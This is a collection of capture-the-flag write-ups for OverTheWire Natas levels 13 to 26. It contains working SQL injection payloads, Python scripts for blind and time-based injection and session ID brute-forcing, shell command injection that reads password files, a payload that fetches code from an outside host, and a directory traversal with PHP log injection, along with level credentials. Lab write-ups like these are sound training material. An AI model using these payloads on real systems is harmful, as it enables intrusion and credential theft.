43 | 44 | 45 | 46 | and check the content 47 | 48 | $ curl -u natas13:jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY http://natas13.natas.labs.overthewire.org/upload/7q86uwt60z.php 49 | ��Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1 50 | -------------------------------------------------------------------------------- /overthewire/natas/natas14.md: -------------------------------------------------------------------------------- 1 | # Natas14 2 | 3 | * user: `natas14` 4 | * pass: `Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1` 5 | * url: `http://natas14.natas.labs.overthewire.org` 6 | * flag: `AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J` 7 | 8 | ## Procedure 9 | 10 | 1. By analysing the source code, catches the eye a non parametrised 11 | SQL query 12 | 13 | $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\" and password=\"".$_REQUEST["password"]."\""; 14 | 15 | that means [SQL Injection](http://en.wikipedia.org/wiki/SQL_injection) 16 | 17 | 2. Furthermore, it's possible to enable a simple debugging mode by 18 | providing through a `GET` `username`, `password` and `debug` 19 | parameters. So let's try... 20 | 21 | $ curl -u natas14:Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1 "http://natas14.natas.labs.overthewire.org/?debug&username=alice&password=s3cr3t" 22 | 23 | 24 | [cut] 25 | 26 | 27 |

natas14

28 |

29 | Executing query: SELECT * from users where username="alice" and password="s3cr3t"
Access denied!

View sourcecode

30 |

31 | 32 | 33 | 34 | 3. It seems to work. Let's try something tricky... 35 | 36 | $ curl -u natas14:Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1 --data "username=1\"%20or%20\"a\"=\"a\"#&password=NotNecessary" "http://natas14.natas.labs.overthewire.org/?debug" 37 | 38 | 39 | [cut] 40 | 41 | 42 |

natas14

43 |

44 | Executing query: SELECT * from users where username="1" or "a"="a"#" and password="NotNecessary"
Successful login! The password for natas15 is AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J

View sourcecode

45 |

46 | 47 | 48 | 49 | Yep! It works! The key is to pass as `username` the following string 50 | 51 | 1" or "a"="a"# 52 | -------------------------------------------------------------------------------- /overthewire/natas/natas15.md: -------------------------------------------------------------------------------- 1 | # Natas15 2 | 3 | * user: `natas15` 4 | * pass: `AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J` 5 | * url: `http://natas15.natas.labs.overthewire.org` 6 | * flag: `WaIHEacj63wnNIBROHeqi3p9t0m5nhmh` 7 | 8 | ## Procedure 9 | 10 | 1. Similarly to Natas14, also in this level a SQL Injection is feasible. 11 | Indeed, we have a text field where users' existence is checkable via 12 | a not parametrised SQL query. 13 | 14 | 2. We're looking for Natas16 password, so let's try if user `natas16` 15 | exists... 16 | 17 | $ curl -u natas15:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J http://natas15.natas.labs.overthewire.org/?username=natas16 18 | 19 | [cut] 20 |

21 | This user exists.

View sourcecode

22 |

23 | 24 | 25 | 26 | 3. Well. Differently from Natas16, poisoned query's execution not 27 | provides any direct information. This means that we have to try a 28 | brute force attack. 29 | 30 | 4. First of all we have to identify the charset containing only chars 31 | used in the password. To do that, we can exploit the operator `LIKE` 32 | allowing us to perform pattern matching. In practice, SQL code that 33 | we'll inject is 34 | 35 | natas16" AND password LIKE BINARY "%%" " 36 | 37 | 5. In this case, Python can help us. The following script performs a 38 | brute force attack to identify the password charset 39 | 40 | import requests 41 | 42 | target = 'http://natas15.natas.labs.overthewire.org' 43 | charset_0 = ( 44 | '0123456789' + 45 | 'abcdefghijklmnopqrstuvwxyz' + 46 | 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' 47 | ) 48 | charset_1 = '' 49 | 50 | for c in charset_0: 51 | username = ('natas16" AND password LIKE BINARY "%' + c +'%" "') 52 | r = requests.get(target, 53 | auth=('natas15','AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J'), 54 | params={"username": username} 55 | ) 56 | if "This user exists" in r.text: 57 | charset_1 += c 58 | print ('CSET: ' + charset_1.ljust(len(charset_0), '*')) 59 | 60 | By executing the script, final result will be 61 | 62 | CSET: 0************************************************************* 63 | CSET: 03************************************************************ 64 | ... 65 | CSET: 03569acehijmnpqtwBEHINORW************************************* 66 | 67 | 6. Well. The sub-charset is 68 | 69 | 03569acehijmnpqtwBEHINORW 70 | 71 | Now let's try to perform a brute force attack against a 32 chars 72 | string (previous passwords were 32 chars strings) with this Python 73 | script 74 | 75 | import requests 76 | 77 | target = 'http://natas15.natas.labs.overthewire.org' 78 | charset_1 = "03569acehijmnpqtwBEHINORW" 79 | 80 | password = "" 81 | while len(password) != 32: 82 | for c in charset_1: 83 | t = password + c 84 | username = ('natas16" AND password LIKE BINARY "' + t +'%" "') 85 | r = requests.get(target, 86 | auth=('natas15','AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J'), 87 | params={"username": username} 88 | ) 89 | if "This user exists" in r.text: 90 | print ('PASS: ' + t.ljust(32, '*')) 91 | password = t 92 | break 93 | 94 | Run it 95 | 96 | $ python natas15.py 97 | PASS: W******************************* 98 | PASS: Wa****************************** 99 | PASS: WaI***************************** 100 | ... 101 | PASS: WaIHEacj63wnNIBROHeqi3p9t0m5nhmh 102 | -------------------------------------------------------------------------------- /overthewire/natas/natas16.md: -------------------------------------------------------------------------------- 1 | # Natas16 2 | 3 | * user: `natas16` 4 | * pass: `WaIHEacj63wnNIBROHeqi3p9t0m5nhmh` 5 | * url: `http://natas16.natas.labs.overthewire.org` 6 | * flag: `8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw` 7 | 8 | ## Procedure 9 | 10 | 1. Our objective is to get the content of file `/etc/natas_webpass/natas17`. 11 | 12 | 1. Similarly to Natas9 and Natas10, there is a BASH script to be 13 | injected. Even if a security check is performed to identify 14 | some "special" characters, `$`, `(` and `)` are allowed... 15 | 16 | 2. Firstly, we can try to load the code to be injected from an external 17 | resource by passing as value of `needle` parameter the following 18 | string 19 | 20 | $(curl -s http://www.example.com/code_to_inject.txt) 21 | 22 | where `code_to_inject.txt` could contain something like 23 | 24 | Africans" dictionary.txt ; cat /etc/natas_webpass/natas17 ; grep -i "Africans 25 | 26 | Unfortunately, this way seems to be not followable (probably due to 27 | security settings on target machine). 28 | 29 | 3. Let's try a brute-force approach (like Natas15). Our idea is to 30 | create a switch that informs us whether a token is present in the 31 | flag. 32 | 33 | 4. If we try to check existence of `Africans` we receive the following 34 | result 35 | 36 | $ curl -u natas16:WaIHEacj63wnNIBROHeqi3p9t0m5nhmh -d "needle=Africans" http://natas16.natas.labs.overthewire.org 37 | [cut] 38 |

 39 | 		Africans
 40 |

41 | [cut] 42 | 43 | while with `XAfricans` we receive 44 | 45 | $ curl -u natas16:WaIHEacj63wnNIBROHeqi3p9t0m5nhmh -d "needle=XAfricans" http://natas16.natas.labs.overthewire.org 46 | [cut] 47 |

 48 |

49 | [cut] 50 | 51 | The base idea of our switch is to check the string `XAfricans` where 52 | `X` could be `NULL`. In this way, we'll have two states. 53 | 54 | 5. `X` will be the result of 55 | 56 | grep -E ^.* /etc/natas_webpass/natas17 57 | 58 | Indeed, if `token` is at the beginning of password, value of `token` 59 | will be shown. Otherwise, nothing is shown. 60 | 61 | 6. Our brute-force consists in assigning to `needle` the iteration (over 62 | the charset `A-Za-z0-9`) of the following command 63 | 64 | $(grep -E ^.* /etc/natas_webpass/natas17)Africans 65 | 66 | Of course, Python will help us 67 | 68 | import requests 69 | 70 | target = 'http://natas16.natas.labs.overthewire.org' 71 | charset_0 = ( 72 | '0123456789' + 73 | 'abcdefghijklmnopqrstuvwxyz' + 74 | 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' 75 | ) 76 | 77 | p = '' 78 | i = 0 79 | while len(p) != 32: 80 | while i < len(charset_0): 81 | c = charset_0[i] 82 | needle = ('$(grep -E ^%s%c.* /etc/natas_webpass/natas17)Africans' % (p, c)) 83 | r = requests.get(target, 84 | auth=('natas16','WaIHEacj63wnNIBROHeqi3p9t0m5nhmh'), 85 | params={"needle": needle} 86 | ) 87 | if "Africans" not in r.text: 88 | p += c 89 | print ('P: ' + p.ljust(32, '*')) 90 | i = 0 91 | else: 92 | i += 1 93 | 94 | 7. This is the final result 95 | 96 | $ python natas16.py 97 | P: 8******************************* 98 | ... 99 | P: 8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9** 100 | P: 8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9c* 101 | P: 8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw 102 | -------------------------------------------------------------------------------- /overthewire/natas/natas17.md: -------------------------------------------------------------------------------- 1 | # Natas17 2 | 3 | * user: `natas17` 4 | * pass: `8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw` 5 | * url: `http://natas17.natas.labs.overthewire.org` 6 | * flag: `xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP` 7 | 8 | ## Procedure 9 | 10 | 1. Just another brute force attack very similar to 11 | [Natas15](natas15.md) and [Natas16](natas16.md). The difference 12 | here is that no text-based evidence about query execution's result 13 | is provided (see commented line in the source code). 14 | 15 | 2. Despite this, we can try with a time-based blind SQL injection. We'll 16 | reuse solution of [Natas15](natas15.md) but in this case the 17 | injected string are 18 | 19 | natas18" AND IF(password LIKE BINARY "%%",SLEEP(15), 1)# 20 | 21 | and 22 | 23 | natas18" AND IF(password LIKE BINARY "%",SLEEP(15), 1)# 24 | 25 | Below the Python script 26 | 27 | import requests 28 | 29 | pwd_len = 32 30 | 31 | charset_0 = ( 32 | '0123456789' + 33 | 'abcdefghijklmnopqrstuvwxyz' + 34 | 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' 35 | ) 36 | charset_1 = '' 37 | 38 | target = 'http://natas17.natas.labs.overthewire.org' 39 | auth=('natas17','8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw') 40 | sleep_time = 15 41 | 42 | for c in charset_0: 43 | username = 'natas18" AND IF(password LIKE BINARY "%%%c%%",SLEEP(%d), 1)#' % (c, sleep_time) 44 | r = requests.get(target, auth=auth, params={"username": username} 45 | ) 46 | s = r.elapsed.total_seconds() 47 | if s >= sleep_time: 48 | charset_1 += c 49 | print ('C: ' + charset_1.ljust(len(charset_0), '*')) 50 | 51 | print "" 52 | 53 | password = "" 54 | while len(password) != pwd_len: 55 | for c in charset_1: 56 | t = password + c 57 | username = 'natas18" AND IF(password LIKE BINARY "%s%%",SLEEP(%d), 1)#' % (t, sleep_time) 58 | r = requests.get(target, auth=auth, params={"username": username} 59 | ) 60 | s = r.elapsed.total_seconds() 61 | if s >= sleep_time: 62 | print ('P: ' + t.ljust(pwd_len, '*')) 63 | password = t 64 | break 65 | 66 | 3. Let's try to run the script 67 | 68 | $ python natas17.py 69 | C: 0************************************************************* 70 | ... 71 | C: 047dghjlmpqsvwxyCDFIKOP*************************************** 72 | C: 047dghjlmpqsvwxyCDFIKOPR************************************** 73 | 74 | P: x******************************* 75 | ... 76 | P: xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhd* 77 | P: xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP 78 | -------------------------------------------------------------------------------- /overthewire/natas/natas18.md: -------------------------------------------------------------------------------- 1 | # Natas18 2 | 3 | * user: `natas18` 4 | * pass: `xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP` 5 | * url: `http://natas18.natas.labs.overthewire.org` 6 | * flag: `4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs` 7 | 8 | ## Procedure 9 | 10 | 1. In source code, directive 11 | 12 | $maxid = 640; // 640 should be enough for everyone 13 | 14 | suggests us that `PHPSESSID` may assume values up to `640`. This number is 15 | sufficiently low to allow a brute-force attack against `PHPSESSID` 16 | variable in order to perform [Session Hijacking](http://en.wikipedia.org/wiki/Session_hijacking). 17 | 18 | 2. A simple Python script (see [natas18.py](./scripts/natas18.py)) will 19 | do it on behalf of us 20 | 21 | import requests 22 | 23 | target = 'http://natas18.natas.labs.overthewire.org' 24 | auth = ('natas18','xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP') 25 | params = dict(username='admin', password='s3cr3t') 26 | cookies = dict() 27 | 28 | max_s_id = 640 29 | s_id = 1 30 | while s_id <= max_s_id: 31 | print "Trying with PHPSESSID = " + str(s_id) 32 | cookies = dict(PHPSESSID=str(s_id)) 33 | r = requests.get(target, auth=auth, params=params, cookies=cookies) 34 | if "You are an admin" in r.text: 35 | print r.text 36 | break 37 | s_id += 1 38 | 39 | This is the result 40 | 41 | $ python natas18.py 42 | Trying with PHPSESSID = 1 43 | Trying with PHPSESSID = 2 44 | ... 45 | Trying with PHPSESSID = 45 46 | Trying with PHPSESSID = 46 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 |

natas18

59 |

60 | You are an admin. The credentials for the next level are:

Username: natas19
61 | 		Password: 4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs

View sourcecode

62 |

63 | 64 | 65 | -------------------------------------------------------------------------------- /overthewire/natas/natas19.md: -------------------------------------------------------------------------------- 1 | # Natas19 2 | 3 | * user: `natas19` 4 | * pass: `4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs` 5 | * url: `http://natas19.natas.labs.overthewire.org` 6 | * flag: `eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF` 7 | 8 | ## Procedure 9 | 10 | 1. Since values of PHPSESSID are not sequential, we have to try if it's 11 | possible to evaluate the randomness in order to predict values. To do that 12 | we need a significant number of generated PHPSESSID and the try to execute 13 | some statistics. 14 | 15 | 2. Statistics are executed by Python script 16 | [natas19_stats.py](./scripts/natas19_stats.py). Run it 17 | 18 | $ python natas19_stats.py 19 | Just a simple analysis: 20 | PHPSESSIDs with 18 chars: 82.00% 21 | PHPSESSIDs with 14 chars: 2.00% 22 | PHPSESSIDs with 16 chars: 14.00% 23 | 24 | Chose length: 18 25 | 26 | With 300 captures 27 | char at position 0 of PHPSESSID is '3' with accurancy 100.00% 28 | char at position 1 of PHPSESSID is '1' with accurancy 20.00% 29 | char at position 2 of PHPSESSID is '3' with accurancy 100.00% 30 | char at position 3 of PHPSESSID is '2' with accurancy 14.00% 31 | char at position 4 of PHPSESSID is '3' with accurancy 100.00% 32 | char at position 5 of PHPSESSID is '3' with accurancy 13.00% 33 | char at position 6 of PHPSESSID is '2' with accurancy 100.00% 34 | char at position 7 of PHPSESSID is 'd' with accurancy 100.00% 35 | char at position 8 of PHPSESSID is '6' with accurancy 100.00% 36 | char at position 9 of PHPSESSID is '1' with accurancy 100.00% 37 | char at position 10 of PHPSESSID is '6' with accurancy 100.00% 38 | char at position 11 of PHPSESSID is '4' with accurancy 100.00% 39 | char at position 12 of PHPSESSID is '6' with accurancy 100.00% 40 | char at position 13 of PHPSESSID is 'd' with accurancy 100.00% 41 | char at position 14 of PHPSESSID is '6' with accurancy 100.00% 42 | char at position 15 of PHPSESSID is '9' with accurancy 100.00% 43 | char at position 16 of PHPSESSID is '6' with accurancy 100.00% 44 | char at position 17 of PHPSESSID is 'e' with accurancy 100.00% 45 | 46 | The output inform us that 82% of the captures is 18 chars length, so it's 47 | a good candidate for our flag. Then, by considering only IDs with 18 chars, 48 | we have an evaluation of the characters. According to the statistics, our 49 | PHPSESSID should be like this: 50 | 51 | 3 [?] 3 [?] 3 [?] 2d61646d696e 52 | 53 | 3. Now we can try with a brute-force because the range of possible solutions 54 | is reasonable (16x16x16). 55 | 56 | while x <= 0xf: 57 | while y <= 0xf: 58 | while z <= 0xf: 59 | phpsessid = (('3%s3%s3%s2d61646d696e') % 60 | (hex(x)[2:], hex(y)[2:], hex(z)[2:])) 61 | cookies['PHPSESSID'] = phpsessid 62 | print 'Trying with: %s' % phpsessid 63 | r = requests.get(target, auth=auth, params=params, cookies=cookies) 64 | if "You are logged in as a regular user." not in r.text: 65 | print r.text 66 | sys.exit(0) 67 | z += 1 68 | y += 1 69 | z = 0x0 70 | x += 1 71 | y = 0x0 72 | z = 0x0 73 | 74 | Also in this case, Python is our best friend... 75 | 76 | $ python natas19.py 77 | Trying with: 3030302d61646d696e 78 | ... 79 | Trying with: 33373f2d61646d696e 80 | Trying with: 3338302d61646d696e 81 | Trying with: 3338312d61646d696e 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 |

natas19

94 |

95 |

96 | 97 | This page uses mostly the same code as the previous level, but session IDs are no longer sequential... 98 | 99 |

100 | You are an admin. The credentials for the next level are:

Username: natas20
101 | 		Password: eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF

102 | 103 | 104 | -------------------------------------------------------------------------------- /overthewire/natas/natas20.md: -------------------------------------------------------------------------------- 1 | # Natas20 2 | 3 | * user: `natas20` 4 | * pass: `eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF` 5 | * url: [http://natas20.natas.labs.overthewire.org](http://natas20:eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF@natas20.natas.labs.overthewire.org) 6 | * flag: `IFekPyrQXftziDEsUr3x21sYuahypdgJ` 7 | 8 | ## Procedure 9 | 10 | 1. In this level it's realistic to say that session ID cannot be predicted. 11 | Indeed, it seems to be totally random. 12 | 13 | 2. By taking a look in the source code, we can see that custom handlers for 14 | session storing management were defined. In our case the intersing ones are 15 | `myread()` and `mywrite()`. 16 | 17 | 3. In `myread()` we can see that session file's content is split by using 18 | `\n` (newline) as separator character. 19 | 20 | $_SESSION = array(); 21 | foreach(explode("\n", $data) as $line) { 22 | debug("Read [$line]"); 23 | ... 24 | } 25 | 26 | Furthermore, to fill the `$_SESSION` array, each line is expected to be in 27 | the form `key value` 28 | 29 | $_SESSION = array(); 30 | foreach(explode("\n", $data) as $line) { 31 | ... 32 | $parts = explode(" ", $line, 2); 33 | if($parts[0] != "") 34 | $_SESSION[$parts[0]] = $parts[1]; 35 | } 36 | 37 | 4. To get authenticated as `admin`, page checks if session contains the `admin` 38 | key and if its value in `1`. 39 | 40 | function print_credentials() { /* {{{ */ 41 | if($_SESSION and array_key_exists("admin", $_SESSION) and $_SESSION["admin"] == 1) { 42 | print "You are an admin. The credentials for the next level are:
"; 43 | print "

Username: natas21\n";
 44 | 				print "Password:

"; 45 | } else { 46 | print "You are logged in as a regular user. Login as an admin to retrieve credentials for natas21."; 47 | } 48 | } 49 | 50 | 5. When parameter called `name` is posted, a new session is initialised and 51 | value of `name` is stored on it (without being sanitised!!!). 52 | 53 | 6. Few lines of Python ([natas20.py](./scripts/natas20.py)) will do the attack 54 | 55 | import requests 56 | 57 | target = 'http://natas20.natas.labs.overthewire.org' 58 | auth = ('natas20', 'eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF') 59 | 60 | print "#" 61 | print "# FIRST REQUEST" 62 | print "#" 63 | params = dict(name='admin\nadmin 1', debug='') # <-- this is the key part 64 | # ^^^^^^^^^^^^^^^^^^^^^ 65 | cookies = dict() 66 | r = requests.get(target, auth=auth, params=params, cookies=cookies) 67 | phpsessid = r.cookies['PHPSESSID'] 68 | print r.text 69 | 70 | print "\n\n" 71 | print "#" 72 | print "# SECOND REQUEST" 73 | print "#" 74 | params = dict(debug='') 75 | cookies = dict(PHPSESSID=phpsessid) 76 | r = requests.get(target, auth=auth, params=params, cookies=cookies) 77 | print r.text 78 | 79 | In practice, we'll inject the `admin` parameter via the `name` parameter. 80 | 81 | $ pyton natas20.py 82 | # 83 | # FIRST REQUEST 84 | # 85 | 86 | 87 | [cut] 88 | 89 | 90 |

natas20

91 |

92 | DEBUG: MYREAD 3ja0006ku6rh8birk8i66nlrr5
DEBUG: Session file doesn't exist
DEBUG: Name set to admin 93 | admin 1
You are logged in as a regular user. Login as an admin to retrieve credentials for natas21. 94 | 95 | [cut] 96 | 97 | DEBUG: MYWRITE 3ja0006ku6rh8birk8i66nlrr5 name|s:13:"admin 98 | admin 1";
DEBUG: Saving in /var/lib/php5/mysess_3ja0006ku6rh8birk8i66nlrr5
DEBUG: name => admin 99 | admin 1
100 | 101 | # 102 | # SECOND REQUEST 103 | # 104 | 105 | 106 | [cut] 107 | 108 | 109 |

natas20

110 |

111 | DEBUG: MYREAD 3ja0006ku6rh8birk8i66nlrr5
DEBUG: Reading from /var/lib/php5/mysess_3ja0006ku6rh8birk8i66nlrr5
DEBUG: Read [name admin]
DEBUG: Read [admin 1]
DEBUG: Read []
You are an admin. The credentials for the next level are:

Username: natas21
112 | 		Password: IFekPyrQXftziDEsUr3x21sYuahypdgJ

113 | 114 | [cut] 115 | 116 | 117 | 118 | -------------------------------------------------------------------------------- /overthewire/natas/natas21.md: -------------------------------------------------------------------------------- 1 | # Natas21 2 | 3 | * user: `natas21` 4 | * pass: `IFekPyrQXftziDEsUr3x21sYuahypdgJ` 5 | * url: 6 | * [http://natas21.natas.labs.overthewire.org](http://natas21:IFekPyrQXftziDEsUr3x21sYuahypdgJ@natas21.natas.labs.overthewire.org) 7 | * [http://natas21-experimenter.natas.labs.overthewire.org](http://natas21:IFekPyrQXftziDEsUr3x21sYuahypdgJ@natas21-experimenter.natas.labs.overthewire.org) 8 | * flag: `chG9fbe1Tq2eWVMgjYYD1MsfIvN461kJ` 9 | 10 | ## Procedure 11 | 12 | 1. Function `print_credentials()` in main page, checks if `$_SESSION` 13 | has `admin` parameter and if its value is equal to `1` 14 | 15 | if($_SESSION and array_key_exists("admin", $_SESSION) and $_SESSION["admin"] == 1) { 16 | print "You are an admin. The credentials for the next level are:
"; 17 | print "

Username: natas22\n";
18 | 			print "Password:

"; 19 | } else { 20 | print "You are logged in as a regular user. Login as an admin to retrieve credentials for natas22."; 21 | } 22 | 23 | 2. In "experimenter" page, if `$_REQUEST` contains `submit` key, all 24 | the contained attributes are saved in `$_SESSION` 25 | 26 | if(array_key_exists("submit", $_REQUEST)) { 27 | foreach($_REQUEST as $key => $val) { 28 | $_SESSION[$key] = $val; 29 | } 30 | } 31 | 32 | 3. Well, the attack is defined. By passing `admin=1` in experimenter 33 | page, we will be able to get password for Natas22. Python 34 | [natas21.py](./scripts/natas21.py) will help us 35 | 36 | import requests 37 | 38 | target = 'http://natas21-experimenter.natas.labs.overthewire.org' 39 | auth = ('natas21', 'IFekPyrQXftziDEsUr3x21sYuahypdgJ') 40 | 41 | params = dict(debug='', submit='', admin=1) 42 | # ^^^^^^^ <- this is the trick 43 | cookies = dict() 44 | r = requests.get(target, auth=auth, params=params, cookies=cookies) 45 | phpsessid = r.cookies['PHPSESSID'] 46 | print r.text 47 | 48 | target = 'http://natas21.natas.labs.overthewire.org' 49 | params = dict(debug='') 50 | cookies = dict(PHPSESSID=phpsessid) 51 | r = requests.get(target, auth=auth, params=params, cookies=cookies) 52 | print r.text 53 | 54 | Let's try 55 | 56 | $ python natas21.py 57 | 58 | 59 | [cut] 60 | 61 |

62 | [DEBUG] Session contents:
Array 63 | ( 64 | [admin] => 1 65 | [debug] => 66 | [submit] => 67 | ) 68 | 69 |

Example:

70 | 71 | [cut] 72 | 73 | 74 | 75 | 76 | 77 | [cut] 78 | 79 | You are an admin. The credentials for the next level are:

Username: natas22
80 | 		Password: chG9fbe1Tq2eWVMgjYYD1MsfIvN461kJ

81 | 82 | [cut] 83 | 84 | 85 | 86 | -------------------------------------------------------------------------------- /overthewire/natas/natas22.md: -------------------------------------------------------------------------------- 1 | # Natas22 2 | 3 | * user: `natas22` 4 | * pass: `chG9fbe1Tq2eWVMgjYYD1MsfIvN461kJ` 5 | * url: [http://natas22.natas.labs.overthewire.org](http://natas22:chG9fbe1Tq2eWVMgjYYD1MsfIvN461kJ@natas22.natas.labs.overthewire.org) 6 | * flag: `D0vlad33nQF0Hz2EP255TP5wSW9ZsRSE` 7 | 8 | ## Procedure 9 | 10 | 1. Probably one of the simplest levels 11 | 12 | $ curl -i -XGET -u natas22:chG9fbe1Tq2eWVMgjYYD1MsfIvN461kJ http://natas22.natas.labs.overthewire.org/?revelio 13 | HTTP/1.1 302 Found 14 | Date: Fri, 10 Apr 2015 19:01:45 GMT 15 | Server: Apache/2.4.7 (Ubuntu) 16 | X-Powered-By: PHP/5.5.9-1ubuntu4.7 17 | Set-Cookie: PHPSESSID=90gd0gl4m2jg8p1p31hfd2ma77; path=/; HttpOnly 18 | Expires: Thu, 19 Nov 1981 08:52:00 GMT 19 | Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 20 | Pragma: no-cache 21 | Location: / 22 | Content-Length: 1049 23 | Content-Type: text/html 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 |

natas22

37 |

38 | 39 | You are an admin. The credentials for the next level are:

Username: natas23
40 | 		Password: D0vlad33nQF0Hz2EP255TP5wSW9ZsRSE

41 |

View sourcecode

42 |

43 | 44 | 45 | 46 | -------------------------------------------------------------------------------- /overthewire/natas/natas23.md: -------------------------------------------------------------------------------- 1 | # Natas23 2 | 3 | * user: `natas23` 4 | * pass: `D0vlad33nQF0Hz2EP255TP5wSW9ZsRSE` 5 | * url: [http://natas23.natas.labs.overthewire.org](http://natas23:D0vlad33nQF0Hz2EP255TP5wSW9ZsRSE@natas23.natas.labs.overthewire.org) 6 | * flag: `OsRmXFguozKpTZZ5X14zNO43379LZveg` 7 | 8 | ## Procedure 9 | 10 | $ curl -XGET -u natas23:D0vlad33nQF0Hz2EP255TP5wSW9ZsRSE http://natas23.natas.labs.overthewire.org/?passwd=20%20iloveyou 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 |

natas23

23 |

24 | 25 | Password: 26 | 30 | 31 |
The credentials for the next level are:

Username: natas24 Password: OsRmXFguozKpTZZ5X14zNO43379LZveg

32 |

View sourcecode

33 |

34 | 35 | 36 | 37 | -------------------------------------------------------------------------------- /overthewire/natas/natas24.md: -------------------------------------------------------------------------------- 1 | # Natas24 2 | 3 | * user: `natas24` 4 | * pass: `OsRmXFguozKpTZZ5X14zNO43379LZveg` 5 | * url: [http://natas24.natas.labs.overthewire.org](http://natas24:OsRmXFguozKpTZZ5X14zNO43379LZveg@natas24.natas.labs.overthewire.org) 6 | * flag: `GHF6X7YwACaYYssHVY05cFq83hRktl4c` 7 | 8 | ## Procedure 9 | 10 | 1. In this level, password is checked by using `strcmp()` function. 11 | According to documentation, this function returns only values `> 0`, 12 | `< 0` and `= 0`. So our target is to have the return value equal to 13 | 0. 14 | 15 | 2. In PHP, `strcmp()` has a strange behaviour. Indeed, if the passed 16 | arguments are not string, it returns 0. So, let's try by passing the 17 | empty array `passwd[]` 18 | 19 | $ curl -XGET -u natas24:OsRmXFguozKpTZZ5X14zNO43379LZveg http://natas24.natas.labs.overthewire.org/?passwd%5b%5d 20 | 21 | 22 | 23 | 24 | [cut] 25 | 26 | Warning: strcmp() expects parameter 1 to be string, array given in /var/www/natas/natas24/index.php on line 23
27 |
The credentials for the next level are:

Username: natas25 Password: GHF6X7YwACaYYssHVY05cFq83hRktl4c

28 | 29 | [cut] 30 | 31 | 32 | -------------------------------------------------------------------------------- /overthewire/natas/natas25.md: -------------------------------------------------------------------------------- 1 | # Natas25 2 | 3 | * user: `natas25` 4 | * pass: `GHF6X7YwACaYYssHVY05cFq83hRktl4c` 5 | * url: [http://natas25.natas.labs.overthewire.org](http://natas25:GHF6X7YwACaYYssHVY05cFq83hRktl4c@natas25.natas.labs.overthewire.org) 6 | * flag: `oGgWAJ7zcGT28vYazGo4rkhOPDhBu34T` 7 | 8 | ## Procedure 9 | 10 | 1. At first look, seems that `lang` parameter could be the vehicle of 11 | the attack. According to the source code, some checks are performed 12 | on it... 13 | 14 | 2. Firstly, we're not allowed to include `natas_webpass` string, so 15 | direct access to `/etc/natas_webpass/natas26` file is not feasible. 16 | 17 | 3. Secondly, a check against the presence of `../` is performed. In 18 | this case, all the occurrences of `../` in `$filename` are removed. 19 | 20 | 4. BINGO! The string "`..././`" will be converted in "`../`", so we are 21 | now allowed to fully visit the file system, and then, also the log 22 | file generated by `logRequest()`. 23 | 24 | 5. Since `/etc/natas_webpass/natas26` is not directly accessible, we 25 | can try to access it via the log file. Fortunately, `logRequest()` 26 | function does not perform any check on the variable 27 | `$_SERVER['HTTP_USER_AGENT']`, so we can use it to inject the 28 | PHP code 29 | 30 | 31 | 32 | 6. Well. The attack is defined. A Python script 33 | ([natas25.py](./scripts/natas25.py)) will do it on behalf us. 34 | 35 | $ python scripts/natas25.py 36 | 37 | 38 | 39 | 40 | [cut] 41 | 42 | [01.05.2015 10::59:23] oGgWAJ7zcGT28vYazGo4rkhOPDhBu34T 43 | "Illegal file access detected! Aborting!" 44 | [01.05.2015 10::59:23] oGgWAJ7zcGT28vYazGo4rkhOPDhBu34T 45 | "Directory traversal attempt! fixing request." 46 | 47 | [cut] 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | -------------------------------------------------------------------------------- /overthewire/natas/natas26.md: -------------------------------------------------------------------------------- 1 | # Natas26 2 | 3 | * user: `natas26` 4 | * pass: `oGgWAJ7zcGT28vYazGo4rkhOPDhBu34T` 5 | * url: [http://natas26.natas.labs.overthewire.org](http://natas26:oGgWAJ7zcGT28vYazGo4rkhOPDhBu34T@natas26.natas.labs.overthewire.org) 6 | * flag: `` 7 | 8 | ## Procedure 9 | -------------------------------------------------------------------------------- /overthewire/natas/scripts/natas15.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | target = 'http://natas15.natas.labs.overthewire.org' 4 | charset_0 = ( 5 | '0123456789' + 6 | 'abcdefghijklmnopqrstuvwxyz' + 7 | 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' 8 | ) 9 | charset_1 = '' 10 | 11 | for c in charset_0: 12 | username = ('natas16" AND password LIKE BINARY "%' + c +'%" "') 13 | r = requests.get(target, 14 | auth=('natas15','AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J'), 15 | 